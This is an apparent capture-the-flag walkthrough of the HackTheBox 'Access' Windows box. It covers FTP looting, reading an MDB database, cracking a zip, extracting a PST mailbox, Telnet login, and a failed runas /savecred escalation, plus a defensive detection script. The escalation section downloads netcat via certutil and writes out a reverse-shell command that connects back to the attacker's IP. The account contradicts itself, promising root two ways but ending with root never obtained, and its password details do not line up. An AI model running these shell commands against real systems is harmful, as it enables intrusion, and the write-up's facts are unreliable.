Windows Privilege Escalation Through Runas | HackTheBox Access | CREST CRT Track

HackTheBox Access was a simple Windows box, which is useful to have around because it can be hard to find approachable starting points for users new to Windows. And it didn’t use SMB, unlike other Windows boxes. We’ll begin by requesting a zip file and an Access database via anonymous FTP access. We’ll use command line tools to search the database for a password that opens the zip file, then open it to discover an Outlook mail file. We’ll read the email to find the account password on the box, then use telnet to connect. From there, we’ll access root.txt in two separate ways by using cached administrator credentials.

1. Initial Scan

I kicked things off with an Nmap scan (nmap -A <IP_address>) to see what services were running. This revealed three open ports:

  • Port 21 (FTP): This allowed anonymous access.
  • Port 23 (Telnet): A potential login point.
  • Port 80 (HTTP): A simple webpage with no obvious exploitable vulnerabilities.

2. FTP Exploration

I logged into the FTP server anonymously. It was crucial to enable binary mode (binary) to ensure files downloaded correctly. I found two directories: backups and engineer. From backups, I downloaded a database file named backup.mdb. From engineer, I downloaded a zip file.

3. Database Analysis (MDB File)

Instead of using Microsoft Access, I opted for a Linux tool called mdb-tables (mdb-tables backup.mdb) to list the tables within the database. I quickly identified a promising table named authentication_user. To query this table, I used mdb-sql (mdb-sql backup.mdb).

  • First, I tried to get the usernames: select username from authentication_user; go. This revealed users: admin, engineer, and backup_admin.
  • Then, I tried to get the passwords: select password from authentication_user; go. This gave me the passwords: admin, access_for_you, @security, and admin. The password for the engineer user was access_for_you.

4. Zip File Analysis

I attempted to unzip the zip file with unzip, but it didn’t prompt for a password and didn’t extract any contents. I then used 7z e <zip_file_name>, which did prompt for a password. The password @security (which I found from the database) successfully extracted the contents, revealing a .pst file (an Outlook data file).

5. PST File Analysis

To read the .pst file without Outlook, I used the readpst tool. This extracted the mailboxes. I then used cat <mailbox_file_name> to view the contents of an email. The email, sent to security@accesscontrolsystem.com, revealed a new password for the “security” account: access_for_you.

6. Telnet Access

I used the credentials found in the email (username: security, password: access_for_you) to log in via Telnet (telnet <IP_address>). Unfortunately, the shell was extremely unstable and slow, which foreshadowed later difficulties.

7. Privilege Escalation Attempt (and Frustration!)

I navigated to the Public\Desktop directory and found a link file (.lnk). I used the type <link_file_name> command to view its contents. The link file contained a runas command: runas /user:administrator /savecred <command>. The /savecred option tells runas to use a credential previously saved in the Windows Credential Manager for that account, so the command runs as administrator without a password prompt, provided such a cached credential exists for the administrator account.

My goal was to use runas to get a reverse shell as administrator. I first downloaded netcat to the target machine using certutil. I tried various runas commands to execute netcat and connect back to my machine, for example:

  • runas /user:administrator /savecred "c:\path\to\nc.exe <my_IP> <port> -e cmd.exe"
  • I also tried specifying the full path to runas.exe (c:\windows\system32\runas.exe).

To get a more stable shell, I even attempted to use a Nishang PowerShell reverse shell to connect back to my machine.

Regrettably, none of the runas commands worked. The shell was simply too buggy, and the runas command itself didn’t seem to be functioning correctly on this particular machine. Even running runas by itself didn’t produce any output.
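From the defender's side, the runas /savecred technique above leaves a clear trace in process-creation telemetry. The following Python is an added example (not part of the original walkthrough) that applies two detection rules to constructed Security 4688-style records: runas.exe invoked with /savecred, and certutil.exe used as a downloader. The record field names and all values are assumptions for illustration; real 4688 events only carry the command line when "Include command line in process creation events" auditing is enabled.

```python
import re

# Constructed 4688-style process-creation records (made up for this example).
SAMPLE_EVENTS = [
    {"subject": r"ACCESS\security", "image": r"C:\Windows\System32\runas.exe",
     "cmdline": r'runas /user:administrator /savecred "C:\Windows\System32\cmd.exe"'},
    {"subject": r"ACCESS\security", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -urlcache -split -f http://10.10.14.2/nc.exe C:\Users\Public\nc.exe"},
    {"subject": r"ACCESS\security", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c type C:\Users\Public\Desktop\example.lnk"},
    {"subject": r"ACCESS\Administrator", "image": r"C:\Windows\System32\runas.exe",
     "cmdline": r"runas /user:ACCESS\backup_svc /netonly notepad.exe"},
]


def _image_is(ev, exe):
    # Match on the image name, not on the command line, so a renamed copy
    # of cmd.exe that merely mentions "runas" in an argument is not flagged.
    return ev["image"].lower().endswith("\\" + exe)


# (rule name, description, predicate over one record)
RULES = [
    ("runas_savecred",
     "runas.exe with /savecred: command runs under a credential cached in Credential Manager",
     lambda ev: _image_is(ev, "runas.exe") and re.search(r"(?i)/savecred\b", ev["cmdline"]) is not None),
    ("certutil_download",
     "certutil.exe used as a downloader (-urlcache with a URL)",
     lambda ev: _image_is(ev, "certutil.exe")
     and re.search(r"(?i)-urlcache", ev["cmdline"]) is not None
     and re.search(r"(?i)https?://", ev["cmdline"]) is not None),
]


def target_user(cmdline):
    """Return the account named by /user:, or None if runas was not given one."""
    m = re.search(r"(?i)/user:(\S+)", cmdline)
    return m.group(1) if m else None


def scan(events):
    """Evaluate every rule against every record; return one hit per match."""
    hits = []
    for ev in events:
        for name, desc, pred in RULES:
            if pred(ev):
                hits.append({"rule": name, "subject": ev["subject"],
                             "target": target_user(ev["cmdline"]), "desc": desc})
    return hits


if __name__ == "__main__":
    for h in scan(SAMPLE_EVENTS):
        print(f'{h["rule"]}: {h["subject"]} -> {h["target"]}: {h["desc"]}')
```

A hit whose subject differs from its target (here the security user targeting administrator) is the case worth paging on; on the remediation side, removing the saved entry with cmdkey /delete closes the path the .lnk relied on.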

Conclusion

Due to the extreme instability and issues with the runas command, I wasn’t able to get the root flag in this session. It’s a common frustration with some retired Hack The Box machines – they can be quite buggy! I encourage you to try it yourself, and if you find a way that works, please share it in the comments!

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, who is a cybersecurity content creator and YouTuber.